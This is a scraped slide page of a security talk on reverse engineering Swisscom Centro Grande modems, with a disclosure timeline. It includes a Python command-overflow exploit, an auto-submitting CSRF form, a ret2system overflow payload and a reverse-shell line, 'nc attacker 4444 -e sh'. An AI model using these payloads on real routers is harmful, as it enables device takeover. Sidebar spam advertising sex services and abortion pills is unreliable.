Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 
Colt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinalColt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinal
 

Recently uploaded

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
mohitmore19
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Recently uploaded (20)

%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 

Reverse engineering Swisscom's Centro Grande Modem

  • 1. Reverse engineering Swisscom’s Centro Grande modems
    Alain Mowat & Thomas Imbert
  • 2. whoami
    › Alain Mowat (@plopz0r)
    › Head of Audit division at SCRT
    › Pentest
    › Code review
    › Trainings
    › Mostly a Web App guy
    › Member of 0daysober CTF team
    › Watch other people exploiting cool vulns
  • 3. Background
    › Why look into the Swisscom modems?
    › Why this talk?
    › I don’t actually own a Swisscom modem
    › Made it a bit harder to study...
  • 4. Attack Surface
    › ADB# show netstat
      tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN
      tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN
      tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN
      tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
      tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
      tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN
      tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN
      tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN
      udp 0 0 0.0.0.0:9090 0.0.0.0:*
      udp 0 0 127.0.0.1:15000 0.0.0.0:*
      udp 0 0 0.0.0.0:53 0.0.0.0:*
      udp 0 0 0.0.0.0:323 0.0.0.0:*
      udp 0 0 0.0.0.0:67 0.0.0.0:*
      udp 0 0 0.0.0.0:68 0.0.0.0:*
      udp 0 0 178.199.180.148:5060 0.0.0.0:*
      udp 0 0 192.168.1.1:5351 0.0.0.0:*
      udp 0 0 0.0.0.0:1900 0.0.0.0:*
      udp 0 0 192.168.1.1:47863 0.0.0.0:*
      udp 0 0 0.0.0.0:123 0.0.0.0:*
      udp 0 0 ff02::1:2:547 :::*
      udp 0 0 :::53 :::*
      udp 0 0 :::323 :::*
      udp 0 0 :::123 :::*
      raw 0 0 0.0.0.0:2 0.0.0.0:* 2
      raw 0 0 0.0.0.0:6 0.0.0.0:* 6
      raw 0 0 :::58 :::*
  • 5. Attack Surface
    › ADB# show processes
      256 0 2040 S logd
      259 0 1308 S klogd -c3
      271 0 832 S ec
      343 0 3236 S cm
      350 0 0 SW [dsl0]
      363 0 0 SW [bcmsw]
      364 0 0 SW [bcmsw_timer]
      365 0 0 SW< [linkwatch]
      5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
      6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300
      6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf
      7362 0 1000 S dhcps /tmp/dhcps.conf
      7910 0 764 S dns
      8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
      8026 0 736 S /bin/wpspbc
      8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
      9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
      9177 0 2940 S cwmp
      9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh
      9353 0 884 S ec
      9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300
      11846 0 1332 S /bin/sh DHCPv4Client.sh
      11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
      14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
      15287 0 3576 S voip
      15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
      15923 0 1056 S N chronyd -f /tmp/chrony.conf
      16770 0 820 S radvd
      16812 0 2036 S dibbler-server start
  • 6. Finding the firmware
    › Locate the firmware
    › https://www.swisscom.ch/en/residential/help/device/internet-router/centro-grande.html
    › Vx226x1_61400.sig
    › Version at the time
    › 6.14.00
  • 7. Extracting the firmware
    › Binwalk (https://github.com/devttys0/binwalk)
    › Firmware modification kit
    › ./extract-firmware.sh
  • 8. CPE WAN Management Protocol
    › Also known as TR-069
    › Protocol that defines how to manage « Customer-premises Equipment »
    › cwmp binary
    › Listens to 0.0.0.0:7547
    › iptables rule allows access only from certain Swisscom subnets
  • 9. Web interface
    › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
    › If a binary file is accessed through the web interface, it executes it
    › Directory traversal → Code Exec in version 1.9.3
  • 10. Web interface
    › Mostly managed by a CGI called ui
  • 11. Emulating the device
    › OpenWRT (https://openwrt.org/)
    › Linux distribution for embedded devices
    › Qemu (http://wiki.qemu.org/Main_Page)
    › Machine emulator and virtualizer
  • 12. Configuring OpenWRT
    › make menuconfig
    › MIPS target
    › Add all debugging and networking tools
    › Cross-compile nhttpd
    › Generate ramdisk
    › Copy Swisscom firmware files to the image
    › Run image with qemu
    › qemu-system-mips -kernel openwrt-malta-be-vmlinux-initramfs.elf -net tap -net nic -nographic -m 2048
  • 13. Setting up the image
    › nhttpd server
      serverroot /www
      serveradmin webmaster@adbglobal.com
      servermimes conf/mimes
      docroot /www/htdocs
      docindex lanhosts
      logpid /tmp/logs
      user nobody
      disablehttp 0
      notfound 501
      sslport 443
      sslcert /etc/certs/server.crt
      sslcertkey /etc/certs/server.key
      sslcertca /etc/certs/ca.pem
      sslcertreq *
      serverlisten 0.0.0.0
      servername localhost
  • 16. Web request overview
    [Diagram: POST /ui/swc/login is received by nhttpd and handed to the ui CGI (environment setup, get the corresponding YAPL « script »: swc_login.yapl, swc_common.yapl, swc_firewall.yapl, ...), which sends a configuration command to cm]
  • 17. Configuration manager
    › Used to view and modify the device’s configuration
    › Bound to localhost:9034
    › Also /tmp/cmctl socket
    › Several possible commands
    › GETO, GETV, …
    › SET, SETM, …
    › RESET, REBOOT, ...
    › DUMP, EXPORT, ...
  • 19. Configuration manager
    › Main loop
      listen on localhost port 9034
      socket = accept
      while 1:
          input = socket.recv(16384)
          handleRequest(input)

      def handleRequest(input):
          type = validateRequestType(input)
          params = validateRequestParams(input)
          callTypeHandler(params)
  • 21. Finalizing the image setup
      udhcpc -i br-lan
      cm
      touch /tmp/cmctl
      chmod 777 /tmp/cmctl
      nhttpd -c /www/nhttpd.cfg
      nc localhost 9034
      DOM Device /etc/cm/tr181/dom/
      DOM InternetGatewayDevice /etc/cm/tr098/dom/
      CONF /etc/cm/conf/
      ADD InternetGatewayDevice.WANDevice
      ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
      ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
      SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
      SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
      SET Device.IP.Interface.1.Status Up
      SET Device.Ethernet.Link.1.Name br-lan
      SET Device.DeviceInfo.SerialNumber 123456
      SET Device.IP.Interface.1.X_ADB_Upstream true
      SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
  • 23. Configuration manager
    › Special syntax
    › Similar to SQL in certain ways
    › SELECT =~ GETV
    › UPDATE =~ SET
    › Conditions
    › GETO A.B.C.[Test=1]
    › GETO A.B.C.[Test~1]
    › GETO A.B.C.[Test!1]
  • 24. Vulnerability #1 : Command overflow
    › Each call to recv is treated as a new command
    › By sending more than 16384 characters, we can craft a new configuration command
    › Logging in to the web interface generates a call to the configuration manager that looks like this
    › GETO Users.User.[Username=ATTACKER_CONTROLLED]
    › By providing a long username, we can exceed the 16384 limit and generate a new request within the configuration manager
    › Allows complete control over the device
    › Change passwords
    › Allow remote access
    › ...
  • 25. Vulnerability #1 : Command overflow
    [Diagram: ui → cm]
      ui sends: GETO Users.User.[Username=AAAAAAAAAAAAAAAAAAAAAAAAAAA[…]AAAAAAAAAAAAAAAAAAAAAAAAAAAREBOOT\n
      cm: recv(16384) → process(‘GETO Users……’)
      cm: recv(16384) → process(‘REBOOT’)
      cm: send
  • 26. Exploit #1 : Command overflow
      from requests import post
      payload = dict()
      payload['userName'] = (16358) * 'a' + 'REBOOT' + '\n'
      payload['userPwd'] = 'a'
      payload['login'] = 'Login'
      payload['language'] = ''
      while 1:
          r = post('http://192.168.1.1/ui/swc/login/index', data=payload)
    DEMO
  • 27. Vulnerability #2 : Login CSRF
    › Use CSRF to exploit someone else’s device
      <html>
      <body>
      <form method="POST" action="http://192.168.1.1/ui/swc/login/index">
        <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/>
        <input type="hidden" name="userPwd" value="a"/>
        <input type="hidden" name="login" value="login"/>
        <input type="hidden" name="language" value=""/>
      </form>
      <script>
        document.forms[0].submit();
      </script>
      </body>
      </html>
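The command overflow of slides 24 to 27 as a small C model, added here and not taken from the talk or from the modem's firmware: cm_commands_for_username() replays the 16384-byte recv() framing over the query the ui CGI builds, and username_is_safe() is the input check the CGI was missing. The 64-character limit and the rejected character set are assumptions, not values from the device.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define CM_RECV_SIZE 16384   /* recv() size from slide 24 */
#define USERNAME_MAX 64      /* assumed policy limit, not taken from the device */

static char g_query[2 * CM_RECV_SIZE];
static char g_user[CM_RECV_SIZE + 16];
static char g_verb2[16];
/* Constructed copy of the slide-26 username: 16358 'a' then "REBOOT\n". */
const char *page_payload_username(void)
{
    memset(g_user, 'a', 16358);
    strcpy(g_user + 16358, "REBOOT\n");
    return g_user;
}

/* Model of cm's loop (slides 19 and 24): ui sends one GETO, but cm treats
 * every 16384-byte recv() as its own command, so bytes past the first
 * chunk become a second command whose verb is their first token.
 * Returns how many commands cm would see; see cm_second_verb(). */
int cm_commands_for_username(const char *username)
{
    int len = snprintf(g_query, sizeof g_query,
                       "GETO Users.User.[Username=%s]\n", username);
    int count = 0;
    g_verb2[0] = '\0';
    for (int off = 0; off < len; off += CM_RECV_SIZE, count++) {
        if (count != 1) continue;              /* only record chunk #2 */
        int i = 0;
        while (off + i < len && i < 15 && !isspace((unsigned char)g_query[off + i])) {
            g_verb2[i] = g_query[off + i]; i++;
        }
        g_verb2[i] = '\0';
    }
    return count;
}

const char *cm_second_verb(void) { return g_verb2; }

/* Check the ui CGI should apply before building the query: bounded length,
 * printable bytes only, none of cm's own syntax characters. */
int username_is_safe(const char *u)
{
    size_t len = strlen(u);
    if (len == 0 || len > USERNAME_MAX) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isprint((unsigned char)u[i]) || strchr("[]=~!", u[i])) return 0;
    return 1;
}
```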
  • 28. Exposed web interfaces – Centro Business
    [Screenshot]
  • 29. Vulnerability #3 : Buffer overflow(s)
    › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …)
    › Requirements
    › Arbitrarily-named XML file on the device
    › file and folder are both limited to 4096 in size
      parseFilesInFolder(folder):
          char path[4096];
          files = scandir(folder)
          for file in files:
              if file ends with ".xml":
                  strncat(path, folder, 4096)
                  strncat(path, file, 4096)
                  parseFile(path)
  • 30. Exploit #3 : Creating the XML file
    › The PATHSAVE command takes 2 arguments
    › An XML filename
    › Property that needs to be saved
    › PATHSAVE /tmp/test.xml Users.User.1.Password
    › Can use this to write an arbitrarily-named file on the device
    › Exploit can then be triggered by prepending folder with lots of /
    › CONF /////////////////////////////////////[…]/tmp/exploit.xml
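The strncat misuse from slide 29 next to a bounded replacement, as an added C example rather than ADB's code: slide_pattern_overflows() computes what the two strncat(…, 4096) calls would write, and build_xml_path() refuses a path that does not fit instead of overflowing. The slash-padded folder mirrors the slide-30 trigger and is constructed here.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 4096   /* size of path[] in the slide-29 pseudocode */

/* strncat(dst, src, n) bounds only the bytes taken from src; it knows
 * nothing about how full dst already is.  With n = 4096 for both calls,
 * folder and file can together write close to 2 * 4096 bytes into a
 * 4096-byte buffer (the correct bound is sizeof(path) - strlen(path) - 1).
 * Returns 1 when the slide's pattern would overflow. */
int slide_pattern_overflows(const char *folder, const char *file)
{
    size_t a = strlen(folder) < PATH_BUF ? strlen(folder) : PATH_BUF;
    size_t b = strlen(file) < PATH_BUF ? strlen(file) : PATH_BUF;
    return a + b + 1 > PATH_BUF;           /* +1 for the terminator */
}

/* Hardened builder (added example, not ADB's code): only *.xml names are
 * accepted and an over-long path is refused rather than truncated or
 * overflowed.  Returns the path length, or -1. */
int build_xml_path(char *out, size_t outsz, const char *folder, const char *file)
{
    size_t flen = strlen(file);
    if (flen < 5 || strcmp(file + flen - 4, ".xml") != 0)
        return -1;                          /* not an XML file name */
    int n = snprintf(out, outsz, "%s%s", folder, file);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';                      /* would not fit: reject */
        return -1;
    }
    return n;
}

/* Constructed folder in the slide-30 style: 4090 slashes followed by
 * "/tmp/", 4095 characters in total, so anything appended overflows. */
const char *long_folder(void)
{
    static char f[PATH_BUF];
    memset(f, '/', PATH_BUF - 6);
    strcpy(f + PATH_BUF - 6, "/tmp/");
    return f;
}

/* Convenience wrapper over a fixed 4096-byte buffer, as in the original. */
int try_build(const char *folder, const char *file)
{
    static char path[PATH_BUF];
    return build_xml_path(path, sizeof path, folder, file);
}
```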
  • 31. Exploit #3 : Exploiting a MIPS binary
    [Figure: MIPS function prologue and epilogue]
  • 32. Exploit #3 : Exploiting a MIPS binary
    › No ASLR on the device
    › No NX
    › No canaries
    › A version of nc with the -e switch is present on the device
    › Try to call system(‘nc attacker 4444 -e sh’)
    › Arguments are not passed on the stack though, but in registers
    › $a0
    › $a1
    › …
  • 33. Exploit #3 : ret2system
    › Quick analysis gives address of system in libUclibc (Centro business) :
    › Libuclibc base : 0x2aaf8000
    › System is at offset : 0x54610
    › Real address : 0x2ab4c610
    › Need a gadget in order to get our argument to system in $a0
    › Make $a0 point to address in the stack
    › $s0 is also under our control
  • 34. Exploit #3 : ret2system
      /tmp/aaaaaaaaaaaaaaaa\x2a\xb4\xc6\x10bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\x2a\xb1\xca\xacaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml
    › $ra → gadget
    › $s0 → system
    › command
    › 64 * ‘a’ (addiu $a0,$sp,64)
  • 35. Exploit #3 : Full exploit
    DEMO
  • 36. Disclosure timeline
    › 9 September 2015 : Initial disclosure to Swisscom
    › 10 September 2015 : Vulnerabilities acknowledged by Swisscom
    › 11 September 2015 : Vendor notified (ADB)
    › 18 September 2015 : Confirmation of vulns & quick fix available
    › 24 September 2015 : Test of quick fix
    › 29 September 2015 : Contact with ADB
    › October 2015 : Rollout of quick fix to all devices
    › January 2016 : Status full fix :
    › Centro grande : 100 %
    › Centro Business 1.0 : 50 %
    › Centro Business 2.0 : 100 %
    › 13 June 2016 : Disclosure
  • 37. Swisscom bounty
    › Combination of flaws rewarded with 3’000 CHF
    › Donated to the Ligue Vaudoise contre le Cancer
    › Swisscom Bug Bounty program is up & running
    › Talk is tomorrow afternoon :)
  • 38. Conclusions
    › Attackers
    › Look into other processes on the modem
    › miniupnp
    › voip
    › Embedded devices are found everywhere nowadays
    › Huge attack surface
    › Fewer people reversing firmwares than searching for XSS
    › Defenders
    › Consider 0days in your penetration tests
    › Test your defense in depth
    › Test your ability to detect breaches